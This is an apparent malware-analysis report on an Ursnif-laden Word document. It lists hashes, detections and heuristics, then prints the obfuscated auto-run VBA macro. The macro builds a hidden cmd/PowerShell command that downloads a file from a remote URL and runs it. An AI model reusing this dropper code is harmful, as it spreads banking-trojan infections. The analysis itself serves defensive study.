ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 813a08d3b2216c89…

MALICIOUS

Office (OLE)

68.0 KB · Created: 2018-09-11 07:27:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: c9b9de089d2edf53782422c80f8cea34 SHA-1: 21728bce2c980bd91f960d879bd15e9b992d494c SHA-256: 813a08d3b2216c89d42e8225c6de760d785905d1c76bd7428201d68c3c368f65
182 Risk Score

Malware Insights

ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File

The sample contains a VBA macro whose Document_Open subroutine issues a Shell() call, so a command line is executed as soon as the document is opened with macros enabled. This indicates an attempt to execute arbitrary code, most likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' points strongly to the URSNIF banking trojan family, which is known for its downloader stage.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4913 bytes
SHA-256: e1d3bf73bafec13e7268680b9abda03c4cb35d48870b7f778aaca63108ea6cfe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XJBaPariTlApFB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word invokes Document_Open when the document is opened
' (with macros enabled); nothing below requires further user interaction.
Private Sub Document_open()
' Line-continued "On Error Resume Next": any runtime error (e.g. a failed
' Shell call) is silently swallowed, so the macro never surfaces an error dialog.
On _
Error _
Resume _
Next
   ' VarType calls on throwaway string literals: the results are discarded,
   ' so these statements have no effect. They read as padding that hides the
   ' single meaningful line (the Shell call) among noise.
   VarType "aaAbKpOk" + "Sai"
   VarType "6862" + "wEQsAwI" + "8497" + "7666"
   VarType "fZmQfhnV" + "cz" + "bXXZ" + "631"
   VarType "VhL" + "189122051"
' The only effective statement: runs a command line assembled at runtime from
' the return values of FPwimk (defined in the next module of this preview) and
' FScXPdzAh (not visible in the preview). Format(vbHide) passes window style
' vbHide (0), so the spawned process has no visible window.
Shell FPwimk + FScXPdzAh, Format(vbHide)
   ' Further discarded VarType calls; no effect.
   VarType "QIk" + "il"
   VarType "7764" + "UYzLmHQ" + "423638110" + "1483"
   VarType "4361" + "505152485" + "rCsoNbHsALi" + "35"
   VarType "UjtSm" + "hJsIEzYjLdM"
   VarType "QAXVnswW" + "IbL"
End Sub



Attribute VB_Name = "Ppoaziztooprv"
Function FPwimk()

On _
Error _
Resume _
Next
VarType "rDdf" + "z" + "qF" + "Jj"
   VarType "208042452" + "320418813" + "1421" + "Y"
USojhESRic = Format(Chr(0 + 1 + 2 + 5 + 91)) + "md " + "/V/" + Format(Chr(0 + 1 + 1 + 3 + 62)) + Format(Chr(0 + 0 + 0 + 1 + 33)) + "s" + "^e^t ^" + "K1" + "=" + "^ ^    " + "^ ^ ^" + "    "
VarType "145756278" + "7485" + "XpAVK" + "4435"
   VarType "166611269" + "rhVWwRJnr"
   VarType "2330" + "nXD"
   VarType "3359" + "qFoLc"
Tqssc = "   " + " " + "^  }^" + "}^{^h" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^t^a" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "};ka^e" + "r^b"
VarType "BkQQAmW" + "SEMcUEJhcKwDG"
   VarType "KPVA" + "nFRkMbRVkcYrji" + "Hl" + "GiSC"
   VarType "j" + "697"
oOsKiVzW = ";" + "z^i^" + "A$ m" + "etI-e" + "^k" + "^" + "o" + "v" + "n" + "I;"
VarType "207331631" + "6955"
YjmhqPb = ")" + "^zi" + "^A^$^" + " " + "^,dq" + "^f$" + "(^"
VarType "imbGXS" + "73" + "ZX" + "T"
   VarType "cG" + "TO" + "jlqm" + "7674"
   VarType "Lo" + "2697" + "aiH" + "8114"
   VarType "umj" + "5658"
krszIdntsUo = "e^li^F^" + "dao^lnw" + "^oD." + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^W" + "V^$" + "{^yrt{)" + "t^" + "I^w^$" + "^" + " ni^ d" + "q^f^$(h" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "a^er" + "o^f"
VarType "7073" + "Y"
   VarType "m" + "524295207" + "Sz" + "180447077"
DvWCiTuRV = ";^'e^xe" + ".^'" + "^+Kz" + "^j^$+^'" + "\^'+" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^i" + "l^bu^"
VarType "115130352" + "oozvJb" + "507663410" + "j"
jIBcBnjZ = "p^:vn^" + "e^$=z^" + "i^A$^;^" + "'^9" + "63^" + "' = ^K" + "z^j^$^" + ";" + ")" + "'^@'(" + "t" + "i^l" + "^pS^.^'"
VarType "86" + "BZo"
   VarType "szpBGT" + "uCzB" + "319105642" + "115984271"
   VarType "lPMZF" + "D" + "6563" + "485587061"
   VarType "872" + "XSjDFks"
KWsLc = "nkt.2" + "a^g" + "r^at^=l" + "?php.t" + "^o^ksn"
VarType "Fnjj" + "1596" + "4482" + "wXikQNRcNiv"
   VarType "161119935" + "GWqfczstpCzTo"
HLFivtYKQ = "a" + "po" + "/TT" + "R/mo" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^." + "r^j^" + "5om" + "2" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^s^e"
VarType "161532599" + "75849731" + "kOZkaviORY" + "FpWYJ"
   VarType "ja" + "7133"
   VarType "IViRbDcvc" + "214640097" + "340962204" + "Wi"
   VarType "8229" + "401446853"
   VarType "h" + "7172"
wRhwirP = "fd5^9" + "t" + "//:p^t^" + "t^h'=" + "tI^w"
VarType "cODbnDSi" + "BqtH" + "469663143" + "JD"
   VarType "329795182" + "utHnj" + "472370292" + "FowMHF"
   VarType "fmJf" + "w"
vcjvLjqHS = "$" + ";^tn^e" + "^il" + Format(Chr(0 + 1 + 1 + 3 + 62)) + "be^" + "W^.^" + "t^eN" + " ^t" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "^ej" + "^bo^" + "-^w^"
VarType "rtPlKVoT" + "donY" + "332789427" + "4562"
   VarType "n" + "Izvn" + "owRmkLJH" + "371586533"
   VarType "OHHK" + "382488601" + "8355" + "ZWB"
aPaiGjc = "en=" + Format(Chr(0 + 1 + 2 + 5 + 91)) + "W" + "V" + "$^" + " ^lle" + "h^sr" + "^e^w^o" + "^p&&" + "for /^" + "L %R " + "^in (" + "2^6" + "^5^;-^" + "1"
VarType "Kurh" + "6289"
kBEtovj = ";^0)d" + "^" + "o ^" + "se^t ^Z" + "^Y=" + "!^Z^" + "Y!" + "!^K1:~%" + "R" + ",1!&&i"
FPwimk = USojhESRic + Tqssc + oOsKiVzW + YjmhqPb + krszIdntsUo + DvWCiTuRV + jIBcBnjZ + KWsLc + HLFivtYKQ + wRhwirP + vcjvLjqHS + aPaiGjc + kBEtovj
   VarType "2072" + "Awti" + "Vr" + "6147"
   VarType "9788" + "CC
... (truncated)